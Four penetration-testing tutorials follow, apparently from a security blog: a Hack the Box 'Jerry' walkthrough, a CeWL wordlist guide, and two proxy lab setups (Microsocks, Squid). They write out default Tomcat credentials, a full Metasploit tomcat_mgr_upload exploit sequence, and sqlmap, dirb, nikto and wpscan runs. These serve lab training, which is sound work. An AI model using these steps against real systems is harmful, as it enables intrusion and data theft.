
Hack the Box: Jerry Walkthrough


Hello CTF crackers!! Today we are going to capture the flags on a challenge named “Jerry”, which is available online for those who want to sharpen their skills in penetration testing and black-box testing. Jerry is a retired vulnerable lab presented by Hack the Box, which offers a collection of vulnerable labs as challenges, from beginner to expert level, for online penetration-testing practice.
Level: Easy
Flags: There are two flags. (user.txt & root.txt)
IP Address: 10.10.10.95
Methodology:
§  Port scanning and IP discovery
§  Browsing the IP on port 8080
§  Enumerating served webpage
§  Getting Login Credentials
§  Attacking using Metasploit
§  Getting root Access
§  Reading the flags
Walkthrough
Since these labs are available online via VPN, they have static IP addresses. The IP of Jerry is 10.10.10.95.
Let’s start off by scanning the network to find our target:
nmap -sV 10.10.10.95


Here we notice a very interesting result from the nmap scan: port 8080 is open and running the Apache Tomcat/Coyote JSP engine 1.1.
The next order of business is to browse the IP in a web browser.


On opening the IP in the web browser, we are greeted with the default Tomcat page. After some enumeration here and there, we find the “Manager App” link. On clicking this link, we are presented with a login form, as shown below.


Here, after tinkering with a few passwords and other things, we found that clicking the “Cancel” button triggers a 401 error.


After closely reading the example provided on the webpage, we got the logon credentials:
User: tomcat
Password: s3cret
It’s time to attack, using the Swiss Army knife of every penetration tester: Metasploit.
After some research and a few tries, it was clear that we could use the tomcat_mgr_upload exploit.
So, let’s do this:
msf> use exploit/multi/http/tomcat_mgr_upload
msf exploit(multi/http/tomcat_mgr_upload) > set rhost 10.10.10.95
msf exploit(multi/http/tomcat_mgr_upload) > set rport 8080
msf exploit(multi/http/tomcat_mgr_upload) > set HttpUsername tomcat
msf exploit(multi/http/tomcat_mgr_upload) > set HttpPassword s3cret
msf exploit(multi/http/tomcat_mgr_upload) > exploit
As shown in the screenshot provided below, the exploit runs successfully and gives us a Meterpreter session with elevated privileges.
We traverse the directories to find the flags using commands like “ls” and “cd”.


After a little enumeration, we get to the C:\Users directory. Here we come across the Administrator user directory, so we move into it, and from there into the Desktop directory.
This contains a “flags” directory, which holds a text file named “2 for the price of 1”. On opening it, we get both the user and root flags.



Comprehensive Guide on Cewl Tool


Hello friends!! In this article we focus on generating wordlists using the Kali Linux tool CeWL and learn more about its available options.

Table of Content
§  Introduction to Cewl
§  Default Method
§  Save Wordlist in a file
§  Generating Wordlist of Specific Length
§  Retrieving Emails from a Website
§  Count the Number of Times Each Word Is Repeated on a Website
§  Increase the Depth to Spider
§  Extra Debug Information
§  Verbose Mode
§  Generating an Alpha-Numeric Wordlist
§  Cewl with Digest/Basic Authentication
§  Proxy URL

Introduction to Cewl

CeWL is a Ruby app which spiders a given URL to a specified depth, optionally following external links, and returns a list of words which can then be used for password crackers such as John the Ripper. CeWL also has an associated command-line app, FAB (Files Already Bagged), which uses the same metadata extraction techniques to create author/creator lists from files already downloaded.
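At its core, CeWL turns a fetched page into candidate passwords by stripping the markup and keeping words above a minimum length. That idea can be sketched in a few lines of Python (the function name and regexes here are illustrative; CeWL itself is a Ruby spider and does far more):

```python
import re

def extract_words(html, min_length=3):
    """Illustrative sketch of CeWL's core idea: strip HTML tags, then keep
    unique words at or above the minimum length (default 3, matching CeWL's
    -m default). Not CeWL's actual implementation."""
    text = re.sub(r"<[^>]+>", " ", html)      # crude tag stripping
    words = re.findall(r"[A-Za-z]+", text)    # letters only, like CeWL's default
    return sorted({w for w in words if len(w) >= min_length})

page = "<html><body><h1>Ignite Technologies</h1><p>Penetration testing training</p></body></html>"
print(extract_words(page))
```

Running such a function over every page found while spidering, then de-duplicating, gives the kind of wordlist CeWL prints.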


Type “cewl -h” in the terminal; it will dump all the available options it accepts along with their respective descriptions.
SYNTAX: cewl [options]


General Options
        -h, --help: Show help.
        -k, --keep: Keep the downloaded file.
        -d <x>, --depth <x>: Depth to spider to, default 2.
        -m, --min_word_length: Minimum word length, default 3.
        -o, --offsite: Let the spider visit other sites.
        -w, --write: Write the output to the file.
        -u <agent>, --ua <agent>: User agent to send.
        -n, --no-words: Don't output the wordlist.
        --with-numbers: Accept words with numbers in them as well as just letters.
        -a, --meta: Include metadata.
        --meta_file <file>: Output file for metadata.
        -e, --email: Include email addresses.
        --email_file <file>: Output file for email addresses.
        --meta-temp-dir <dir>: The temporary directory used by exiftool when parsing files, default /tmp.
        -c, --count: Show the count for each word found.
        -v, --verbose: Verbose.
        --debug: Extra debug information.

        Authentication
        --auth_type: Digest or basic.
        --auth_user: Authentication username.
        --auth_pass: Authentication password.

        Proxy Support
        --proxy_host: Proxy host.
        --proxy_port: Proxy port, default 8080.
        --proxy_username: Username for proxy, if required.
        --proxy_password: Password for proxy, if required.



Default Method

Enter the following command, which spiders the given URL to the specified depth and prints a list of words that can then be used as a dictionary for password cracking:
cewl http://www.ignitetechnologies.in/


Save Wordlist in a file

For record maintenance, better readability, and future reference, we save the printed word list to a file. To do this, we use the -w parameter to save the output in a text file.

cewl http://www.ignitetechnologies.in/ -w dict.txt

Now that we have successfully executed the command, let’s traverse to the location to verify whether the output has been saved to the file or not. In this case, our output location is /root/dict.txt.
cat dict.txt




Generating Wordlist of Specific Length

If you want to generate a wordlist with a specific minimum word length, use the -m option, which sets the minimum-word-length parameter.

cewl http://www.ignitetechnologies.in/ -m 9

The above command will generate a list of words of at least 9 characters; as you can observe in the following image, it has crawled the given website and printed the list of words with a minimum of 9 characters.

Retrieving Emails from a Website

You can use the -e option, which enables email extraction, along with the -n option, which hides the word list generated while crawling the given website.

cewl http://www.ignitetechnologies.in/ -n -e

As shown in the image below, it has successfully found 1 email ID on the website.
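The email extraction behind -e boils down to pattern-matching addresses in the page text. A minimal Python sketch of the idea (the regex here is a simple illustration, not the exact pattern CeWL uses):

```python
import re

def extract_emails(text):
    """Find email-like strings in page text, as CeWL's -e option does.
    The regex is deliberately simple and only illustrative."""
    return sorted(set(re.findall(r"[\w.+-]+@[\w-]+\.[\w.-]+", text)))

sample = "Contact us at info@ignitetechnologies.in for training."
print(extract_emails(sample))
```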



Count the Number of Times Each Word Is Repeated on a Website

If you want to count how many times each word is repeated on a website, use the -c option, which enables the count parameter.
cewl http://www.ignitetechnologies.in/ -c
As you can observe from the image below, it has printed the count for each word repeated on the given website.
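The counting that -c performs is a plain word-frequency tally; in Python it can be sketched with collections.Counter (illustrative only, not CeWL's code):

```python
import re
from collections import Counter

def word_counts(text, min_length=3):
    """Tally how often each word occurs, like CeWL's -c output."""
    words = [w for w in re.findall(r"[A-Za-z]+", text) if len(w) >= min_length]
    return Counter(words)

counts = word_counts("security testing security training security")
for word, n in counts.most_common():
    print(word, n)
```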



Increase the Depth to Spider
If you want to increase the spidering depth to generate a larger wordlist by enumerating more new words from the website, use the -d option with a depth level number, which enables the depth parameter for more intensive crawling. By default, the depth level is set to 2.

cewl http://www.ignitetechnologies.in/ -d 3

Extra Debug Information

You can use the --debug option, which enables debug mode and shows errors and raw details of the website while crawling.

cewl http://www.ignitetechnologies.in/ --debug

Verbose Mode

To expand the website crawling results and retrieve more complete details of a website, you can use the -v option for verbose mode. Rather than only generating the wordlist, it will also dump the information available on the website.

cewl http://www.ignitetechnologies.in/ -v


Generating an Alpha-Numeric Wordlist

If you want to generate an alpha-numeric wordlist, you can use the --with-numbers option along with the command.
cewl http://testphp.vulnweb.com/ --with-numbers


From the image below you can observe that this time it has generated an alpha-numeric wordlist.



Cewl with Digest/Basic Authentication

If a page requires authentication to log in to the website, the default command above will not work properly; in order to generate a wordlist you need to get past the authentication page by using the following parameters:
--auth_type:                      Digest or basic.
--auth_user:                      Authentication username.
--auth_pass:                      Authentication password.

cewl http://192.168.1.105/dvwa/login.php --auth_type Digest --auth_user admin --auth_pass password -v
or
cewl http://192.168.1.105/dvwa/login.php --auth_type basic --auth_user admin --auth_pass password -v

From the image below you can observe that it got an HTTP 200 response and hence generated the wordlist.



Proxy URL

When a website is running behind a proxy server, CeWL will not be able to generate a wordlist with the default command, as shown in the image below.

cewl -w dict.txt http://192.168.1.103/wordpress/
You can use the --proxy_host and --proxy_port options to enable the proxy parameters and generate a wordlist with the following command:
cewl --proxy_host 192.168.1.103 --proxy_port 3128 -w dict.txt http://192.168.1.103/wordpress/
As you can observe in the image below, after executing the 2nd command it has successfully printed the list of words as the output.

Socks Proxy Penetration Lab Setup using Microsocks


Hello friends!! In our previous article we discussed “Web Proxy Penetration Lab Setup Testing using Squid”, and in today’s article we are going to set up a SOCKS proxy to use as a proxy server on Ubuntu/Debian machines and try to penetrate it.
Table of Content
·         Introduction to Proxy
·         What is a SOCKS Proxy
·         Difference Between a SOCKS Proxy and an HTTP Proxy
·         SOCKS Proxy Installation
·         Web Proxy Penetration Testing
·         SSH Proxy Penetration Testing
·         FTP Proxy Penetration Testing
Introduction to Proxy
A proxy is a computer system or program that acts as a kind of middleman, an intermediary between your web browser and another computer. Your ISP operates servers: computers designed to deliver information to other computers. It uses proxy servers to accelerate the transfer of information between the server and your computer.
For example: two users, say A and B, both request the same website from the server. Instead of retrieving the data from the original server twice, the proxy “stores or caches” a copy of the site while serving the first request and then sends that copy to the second user without troubling the main server.

What is a SOCKS Proxy?
A SOCKS server is an all-purpose proxy server that creates a TCP connection to another server on the client’s behalf, then exchanges network packets between the client and server. The Tor onion proxy software presents a SOCKS interface to its clients, and even SSH tunnels make their connections using the SOCKS protocol.
For higher security you can go with the SOCKS5 protocol, which provides various authentication options that you cannot get with SOCKS4.
Difference Between a SOCKS Proxy and an HTTP Proxy
§  A SOCKS proxy is low-level and designed to be a general proxy that can accommodate effectively any protocol, program, or type of traffic.
§  SOCKS proxies support both the TCP and UDP transport protocols.
§  SOCKS operates at Layer 5 of the OSI model; a SOCKS server accepts incoming client connections on TCP port 1080.
§  HTTP proxies proxy HTTP requests, while SOCKS proxies proxy socket connections.
§  HTTP proxies are high-level and designed for a specific protocol.
§  HTTP proxies can only process requests from applications that use the HTTP protocol.
§  An HTTP proxy proxies HTTP or web traffic at Layer 7 and typically accepts incoming client connections on port 3128 (the Squid default).
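The SOCKS5 wire format (RFC 1928) that SOCKS servers listen for on TCP port 1080 is compact enough to build by hand. Here is a sketch of the first two messages a client sends, assuming the no-authentication method (a client sends the greeting, reads the server's chosen method, then sends the CONNECT request):

```python
import socket
import struct

def socks5_greeting(methods=(0x00,)):
    """Client greeting per RFC 1928: version 5, method count, method codes.
    Method 0x00 means "no authentication required"."""
    return struct.pack("BB", 5, len(methods)) + bytes(methods)

def socks5_connect(host, port):
    """CONNECT request: VER=5, CMD=1 (connect), RSV=0, ATYP=1 (IPv4),
    then the 4-byte address and 2-byte port in network byte order."""
    return struct.pack("!BBBB", 5, 1, 0, 1) + socket.inet_aton(host) + struct.pack("!H", port)

print(socks5_greeting().hex())                    # -> 050100
print(socks5_connect("192.168.1.103", 22).hex())
```

Once the server replies with a success code, the client simply relays its real traffic (HTTP, SSH, FTP, anything) through the established socket, which is why SOCKS is protocol-agnostic.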
SOCKS Proxy Installation
For our SOCKS proxy lab setup we are going to download MicroSocks from GitHub. MicroSocks is a multithreaded, small, efficient SOCKS5 server. It’s very lightweight and very light on resources too: for every client, a thread with a stack size of 8 KB is spawned.

Let’s start!!
Open the terminal with sudo rights and enter the following command:
git clone https://github.com/rofl0r/microsocks.git



Once the download is complete, run the following commands for installation:
cd microsocks
make
make install



Now execute the following command to run socks proxy on port 1080 without authentication.
microsocks -p 1080


As you can observe, FTP, SSH, HTTP, and SOCKS are running on our local machine; now let’s do SOCKS penetration testing on various protocols to verify whether it is the all-purpose proxy claimed above.


Web Proxy Penetration Testing
Now we configure the Apache service for the web proxy: open the “000-default.conf” file from the path /etc/apache2/sites-available/ and add the following lines to apply these rules to the /html directory over localhost or the machine IP (192.168.1.103).
<Directory /var/www/html>
        Options Indexes FollowSymLinks MultiViews
        AllowOverride None
        Order deny,allow
        Deny from all
        Allow from 127.0.0.1 192.168.1.103
</Directory>
Now save the file and restart the Apache service with the help of the following command.
service apache2 restart

Now when someone tries to access web services through our network, i.e. 192.168.1.103, he/she will be greeted by the following web page:
“Error 403 Forbidden - You don’t have permission to access”.
When you face this type of situation, where port 80 is open but you are unable to access it, it proves the network is running behind a proxy server.



For web proxy penetration testing we had already set up a lab with a web application server such as DVWA (read the article here).
Now, to test whether our proxy server is working, let’s open Firefox and go to Edit –> Preferences –> Advanced –> Network –> Settings, select “Manual proxy configuration”, and enter the SOCKS proxy server IP address (192.168.1.103) and port (1080) to be used for all protocols.


BOOMMM!! Connected to the proxy server successfully in our browser.


SSH Proxy Penetration Testing

Now we configure the hosts.allow file for the SSH proxy: open the /etc/hosts.allow file and add the following lines to allow SSH connections from the localhost IP and restrict them for others.
sshd : localhost : allow
sshd : 192.168.1.103: allow
sshd : ALL: deny



Now open the proxychains configuration file from the given path /etc/proxychains.conf in your Kali Linux machine and add the following line at the bottom.
socks5 192.168.1.103 1080

Now when we try to connect to the target machine via port 22 for an SSH connection, we get the error message “Connection reset by peer”, as shown in the image below after executing the 1st command.
ssh pentest@192.168.1.103  
When you face this type of situation, where port 22 is open but you are unable to access it, it proves the network is running behind a proxy server.
But if you use proxychains with the command, after saving the configuration as described above, you can easily connect to the target network via port 22 for an SSH connection, as shown in the image below after executing the 2nd command.
proxychains ssh pentest@192.168.1.103 

FTP Proxy Penetration Testing
Now we configure the vsftpd.conf file for the FTP proxy: open the /etc/vsftpd.conf file and add the following lines to allow FTP connections from the localhost IP and restrict them for other networks.

Order Allow, Deny
Allow from 127.0.0.1 192.168.1.103
Deny from all


When we try to connect to 192.168.1.103 via port 21 using FileZilla to access the FTP service, we get the error “Connection closed by server”.
When you face this type of situation, where port 21 is open but you are unable to access it, it proves the network is running behind a proxy server.



But FileZilla is feature-rich and offers a generic proxy option that forces passive mode on the FTP connection. Go to Settings > Connection > FTP, select the “generic proxy” option, and make the following configuration settings:
§  Choose SOCKS 5 as the generic proxy
§  Proxy host IP: 192.168.1.103
§  Proxy port: 1080

 

Now, when you again try to connect to the target machine via port 21 to access the FTP service, you will be able to access it easily, as shown in the last image.
This proves that SOCKS is indeed an all-purpose proxy server. Hopefully you have found this article helpful and have completely understood the working of a proxy server and the other related topics covered in this article.


Web Proxy Penetration Lab Setup Testing using Squid


In this article we are going to set up a Squid server to use as a proxy server on Ubuntu/Debian machines and try to penetrate it.

Table of content
§  Introduction to Proxy Setting
§  Squid Proxy Installation
§  Squid Proxy Server Configuration
§  Configuring Apache service for Web Proxy
§  Set-up Manual Proxy in the Browser
§  Directory Brute force Attack on Proxy Server Using DIRB Tool
§  Vulnerability Scanning on Proxy Server Using Nikto Tool
§  SQL Injection on Proxy Server Using Sqlmap Tool
§  WordPress Scanning on Proxy Server Using WPScan Tool

Introduction to Proxy Setting
A proxy is a computer system or program that acts as a kind of middleman, an intermediary between your web browser and another computer. Your ISP operates servers: computers designed to deliver information to other computers. It uses proxy servers to accelerate the transfer of information between the server and your computer.

For example: two users, say A and B, both request the same website from the server. Instead of retrieving the data from the original server twice, the proxy “stores or caches” a copy of the site while serving the first request and then sends that copy to the second user without troubling the main server.

Squid Proxy Installation

Squid is a cross-functional web proxy cache server application which offers proxy and cache services for HTTP, FTP, and other common network protocols, along with proxying of Secure Sockets Layer (SSL) requests, caching of Domain Name Server (DNS) lookups, and transparent caching. Moreover, it supports a wide variety of caching protocols.

Open the hosts file on your local machine to add the localhost address and hostname, because by default squid3 searches for the Ubuntu hostname when establishing connections.


Now use the apt repository to install squid3 by entering the following command.
apt-get install squid3
Squid Proxy Server Configuration

Once the installation is complete, open its configuration file from the given path: /etc/squid3/squid.conf
With Squid’s access control, you can restrict use of the Internet services proxied by Squid to users with specific IP addresses.
Suppose you want to grant access only to users on the 192.168.1.0/24 subnetwork; then add the following line to the ACL section of the squid.conf file:
acl lan src 192.168.1.0/24


Now give your clients permission to access the HTTP service over the local network.
http_access allow lan
To set your Squid server to listen on the default TCP port 3128, set the http_port directive as follows:
http_port 3128
Add the following rules for Squid after setting http_port:
request_header_access Referer deny all
request_header_access X-Forwarded-For deny all
request_header_access Via deny all
request_header_access Cache-Control deny all

You can set forwarded_for to: on|off|transparent|truncate|delete
1.       If set to "on", Squid will append your client's IP address in the HTTP requests it forwards. By default it looks like:
X-Forwarded-For: 192.1.2.3
2.       If set to "off", it will appear as:
X-Forwarded-For: unknown
3.       If set to "transparent", Squid will not alter the X-Forwarded-For header in any way.
4.       If set to "delete", Squid will delete the entire X-Forwarded-For header.
5.       If set to "truncate", Squid will remove all existing X-Forwarded-For entries and place the client's IP address as the sole entry.
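The five modes above can be modeled as a tiny function; this is only a sketch of the documented behaviour (not Squid's source), where `existing` stands for any X-Forwarded-For value already present on the request:

```python
def forwarded_for(mode, existing, client_ip):
    """Model of Squid's forwarded_for modes for the X-Forwarded-For header.
    Illustrative sketch of the documented behaviour, not Squid's code."""
    if mode == "on":            # append the client's real IP
        return f"{existing}, {client_ip}" if existing else client_ip
    if mode == "off":           # substitute "unknown" for the client IP
        return f"{existing}, unknown" if existing else "unknown"
    if mode == "transparent":   # leave the header untouched
        return existing
    if mode == "delete":        # strip the header entirely
        return None
    if mode == "truncate":      # keep only the client's own IP
        return client_ip
    raise ValueError(f"unknown mode: {mode}")

print(forwarded_for("off", None, "192.1.2.3"))   # -> unknown
```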




Here we set forwarded_for to off and saved the file; then use the following command to restart the Squid proxy.
sudo service squid3 restart



Configuring Apache service for Web Proxy
Now open the “000-default.conf” file from the path /etc/apache2/sites-available/ and add the following lines to apply these rules to the /html directory for localhost or the machine IP (192.168.1.103).
<Directory /var/www/html>
        Options Indexes FollowSymLinks MultiViews
        AllowOverride None
        Order deny,allow
        Deny from all
        Allow from 127.0.0.1 192.168.1.103
</Directory>

Now save the file and restart the Apache service with the help of the following command.
service apache2 restart


Now when someone tries to access the HTTP service of our network, i.e. 192.168.1.103, he/she will be greeted by the following web page:
“Error 403 Forbidden - You don’t have permission to access”.

When you face this type of situation, where port 80 is open but you are unable to access it, it proves the network is running behind a proxy server.


Set-up Manual Proxy in the Browser

Now, to test whether our proxy server is working, let’s open Firefox and go to Edit –> Preferences –> Advanced –> Network –> Settings, select “Manual proxy configuration”, and enter the proxy server IP address (192.168.1.103) and port (3128) to be used for all protocols.


BOOMMM!! Connected to the proxy server successfully using the HTTP proxy in our browser.
Directory Brute force Attack on Proxy Server Using DIRB Tool
While making a directory brute-force attack via DIRB, we can use the -p option, which sets a proxy URL to be used for all requests; by default it works on port 1080. As you can observe, on exploring the target network IP in the web browser it puts up an “Access forbidden” error, which means this web page is running behind a proxy.
dirb http://192.168.1.103
dirb http://192.168.1.103 -p 192.168.1.103:3128
From the image below, you can compare the output of the two commands: the 1st command did not find any directories or files, whereas the 2nd command executed successfully.

Vulnerability Scanning on Proxy Server Using Nikto Tool
Similarly, while scanning any network running behind a proxy server, we can use the -useproxy option to scan for vulnerabilities.
nikto -h 192.168.1.103
nikto -h 192.168.1.103 -useproxy http://192.168.1.103:3128
From the image below, you can compare the output of the two commands: the 1st command did not obtain any result, whereas the 2nd command executed successfully.

SQL Injection on Proxy Server Using Sqlmap Tool
As you can observe, on executing the following command it puts up a “403 forbidden” error, which means this web page is running behind a proxy.
sqlmap -u http://192.168.1.103/sqli/Less-1/?id=1 --dbs

Hence we can use the --proxy option to connect to the target URL; therefore execute the following command:
sqlmap -u http://192.168.1.103/sqli/Less-1/?id=1 --dbs --proxy http://192.168.1.103:3128

Now, from the image below, you can observe that we have successfully retrieved the database names by exploiting the SQL injection vulnerability.

WordPress Scanning on Proxy Server Using WPScan Tool
As you can observe, on executing the following command it puts up a “403 forbidden” error, which means this web page is running behind a proxy.
wpscan --url http://192.168.1.103/wordpress --wp-content-dir wp-content
Hence we can use the --proxy option to connect to the target URL; therefore execute the following command:
wpscan --url http://192.168.1.103/wordpress --wp-content-dir wp-content  --proxy http://192.168.1.103:3128
Hopefully you have found this article helpful and have completely understood the working of a proxy server and the other related topics covered in this article.